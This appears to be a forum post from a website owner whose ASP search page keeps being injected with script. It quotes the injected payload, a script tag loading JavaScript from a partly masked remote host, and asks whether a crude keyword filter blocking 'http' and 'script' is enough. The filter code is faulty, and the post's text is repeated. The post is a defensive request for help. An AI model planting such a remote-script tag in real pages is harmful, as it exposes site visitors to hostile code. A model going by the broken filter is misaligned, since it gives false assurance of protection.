S
shank
I've been hit again using DW, parameterized queries and stored procedures.
I'm guessing I was not strict enough with character counts and allowing to
long of a string to pass.
Aside from that, as crude as it may be, is the below enough to stop these
attacks? If not, how would they get around this?
<%
If Instr(Request.QueryString("http")) > 1 or
Instr(Request.QueryString("script")) > 1 Then
Response.Redirect ("e.asp?msg=go away")
End If
%>
A variation of the following script string is being inserted through a
search page:
<script src=http://www.xxxxx.mobi/ngg.js></script>
thanks
I'm guessing I was not strict enough with character counts and allowing to
long of a string to pass.
Aside from that, as crude as it may be, is the below enough to stop these
attacks? If not, how would they get around this?
<%
If Instr(Request.QueryString("http")) > 1 or
Instr(Request.QueryString("script")) > 1 Then
Response.Redirect ("e.asp?msg=go away")
End If
%>
A variation of the following script string is being inserted through a
search page:
<script src=http://www.xxxxx.mobi/ngg.js></script>
thanks